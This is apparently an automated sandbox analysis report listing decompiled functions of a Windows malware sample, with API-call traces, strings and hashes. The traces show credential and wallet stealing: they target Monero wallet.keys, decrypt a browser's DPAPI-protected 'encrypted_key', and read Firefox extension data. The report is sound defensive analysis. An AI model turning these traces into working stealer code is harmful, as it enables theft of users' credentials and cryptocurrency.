Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: ef2ff4b29967c0a5391096c7cda5fe7898ab3236ab63318f19557ac40b785d9a
Instruction ID: d6eac841d2ceabc9b328908401b1ebcf0c31a5d5731b118a1657e51b20beeb8b
Opcode Fuzzy Hash: ef2ff4b29967c0a5391096c7cda5fe7898ab3236ab63318f19557ac40b785d9a
Instruction Fuzzy Hash: 6F011DB9A4020CBBDB00DFE0DC49FAEB7BCEB4C705F008159FA1597280DA709A018B51

Function 0098A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01579448,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0098A0BD
LoadLibraryA.KERNEL32(0157D5A0), ref: 0098A146

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A820: lstrlen.KERNEL32(00984F05,?,?,00984F05,009A0DDE), ref: 0099A82B
Part of subcall function 0099A820: lstrcpy.KERNEL32(009A0DDE,00000000), ref: 0099A885

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

SetEnvironmentVariableA.KERNEL32(01579448,00000000,00000000,?,009A12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,009A0AFE), ref: 0098A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0098A0B2, 0098A0C6, 0098A0DC

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1435860445
Opcode ID: 4858ddeb097cfb1054b1c08d02de299703adbc25e9e1d21d93d9e3448a09408b
Instruction ID: b2256157faadb3e73355e8e670ba643d95fb4aa07bfd00708dc1969de35050b0
Opcode Fuzzy Hash: 4858ddeb097cfb1054b1c08d02de299703adbc25e9e1d21d93d9e3448a09408b
Instruction Fuzzy Hash: EC413EB19111089FDB04EFA8EC99FAA77B8FB4D309F140129E515933A0DF359945CBA3

Function 0098A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 00998B60: GetSystemTime.KERNEL32(009A0E1A,0157CC08,009A05AE,?,?,009813F9,?,0000001A,009A0E1A,00000000,?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 00998B86

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0098A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0098A3FF
lstrlen.KERNEL32(00000000), ref: 0098A6BC

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

DeleteFileA.KERNEL32(00000000), ref: 0098A743

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2a467c9a2afbbd97caa4370f1e3886f39fff0bcca9e08c63ea251ed277434cae
Instruction ID: 08ad6dbeb2b6082f65aa345bf141fa02b4dd1132ab2a817c717f55f82aee3599
Opcode Fuzzy Hash: 2a467c9a2afbbd97caa4370f1e3886f39fff0bcca9e08c63ea251ed277434cae
Instruction Fuzzy Hash: 1EE1D0728101189BDF05FBA9DC92FEE7338EF98304F508169F51676091EF346A49CBA6

Function 0098D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 00998B60: GetSystemTime.KERNEL32(009A0E1A,0157CC08,009A05AE,?,?,009813F9,?,0000001A,009A0E1A,00000000,?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 00998B86

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0098D801
lstrlen.KERNEL32(00000000), ref: 0098D99F
lstrlen.KERNEL32(00000000), ref: 0098D9B3
DeleteFileA.KERNEL32(00000000), ref: 0098DA32

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b0b82e966b5612cd2ebce03652ff05f8fd13c28f8f1bad12fa6fd5f9b2d9db37
Instruction ID: bf97ebbdd9cd4e55ee1d5e63a463f62cd6af069c96209cfe807e0c11554bc9c4
Opcode Fuzzy Hash: b0b82e966b5612cd2ebce03652ff05f8fd13c28f8f1bad12fa6fd5f9b2d9db37
Instruction Fuzzy Hash: 0281EF719201189BCF04FBA8DC96EEE7339FF98304F504129F506A6191EE346A09CBE6

Function 0098F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009899EC
Part of subcall function 009899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00989A11
Part of subcall function 009899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00989A31
Part of subcall function 009899C0: ReadFile.KERNEL32(000000FF,?,00000000,0098148F,00000000), ref: 00989A5A
Part of subcall function 009899C0: LocalFree.KERNEL32(0098148F), ref: 00989A90
Part of subcall function 009899C0: CloseHandle.KERNEL32(000000FF), ref: 00989A9A

Part of subcall function 00998E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00998E52

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,009A1580,009A0D92), ref: 0098F54C
lstrlen.KERNEL32(00000000), ref: 0098F56B

Strings

moz-extension+++, xrefs: 0098F5AD
^userContextId=4294967295, xrefs: 0098F59C

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: c21fa11acce2c58c1fe0076083048ac1fdd834e1dcbeb2e1f24c012151ca25d5
Instruction ID: 29f49d19903a0bddc1ba520c3cc3a7a40bb90b056bc7485d581dc0f8e7084862
Opcode Fuzzy Hash: c21fa11acce2c58c1fe0076083048ac1fdd834e1dcbeb2e1f24c012151ca25d5
Instruction Fuzzy Hash: 1B51DF71D10108AADF04FBA9DC96EED7379EFD4304F408529F816A7191EE346A09CBE6

Function 00989CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 009899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009899EC
Part of subcall function 009899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00989A11
Part of subcall function 009899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00989A31
Part of subcall function 009899C0: ReadFile.KERNEL32(000000FF,?,00000000,0098148F,00000000), ref: 00989A5A
Part of subcall function 009899C0: LocalFree.KERNEL32(0098148F), ref: 00989A90
Part of subcall function 009899C0: CloseHandle.KERNEL32(000000FF), ref: 00989A9A

Part of subcall function 00998E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00998E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00989D39

Part of subcall function 00989AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00984EEE,00000000,00000000), ref: 00989AEF
Part of subcall function 00989AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00984EEE,00000000,?), ref: 00989B01
Part of subcall function 00989AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00984EEE,00000000,00000000), ref: 00989B2A
Part of subcall function 00989AC0: LocalFree.KERNEL32(?,?,?,?,00984EEE,00000000,?), ref: 00989B3F

Part of subcall function 00989B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00989B84
Part of subcall function 00989B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00989BA3
Part of subcall function 00989B60: LocalFree.KERNEL32(?), ref: 00989BD3

Strings

, xrefs: 00989DC1
DPAPI, xrefs: 00989D89
"encrypted_key":", xrefs: 00989D30

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 721d729bc3117094fb0910df515e9322e1561a6fd3aae8caa9c2c3e0caa3c5ad
Instruction ID: c06937cfbf3f76b59a9ce6c880368699ba4a3b1da2687ebc6208cbd0f880c0c9
Opcode Fuzzy Hash: 721d729bc3117094fb0910df515e9322e1561a6fd3aae8caa9c2c3e0caa3c5ad
Instruction Fuzzy Hash: 313110B5D10109ABCF04EBE4DC85BFF77B8AB88304F184519F915A7281E731DA04CBA5

Function 00996AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015794E8,?,009A110C,?,00000000,?,009A1110,?,00000000,009A0AEF), ref: 00996ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00996AE8
CloseHandle.KERNEL32(00000000), ref: 00996AF9
Sleep.KERNEL32(00001770), ref: 00996B04
CloseHandle.KERNEL32(?,00000000,?,015794E8,?,009A110C,?,00000000,?,009A1110,?,00000000,009A0AEF), ref: 00996B1A
ExitProcess.KERNEL32 ref: 00996B22

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
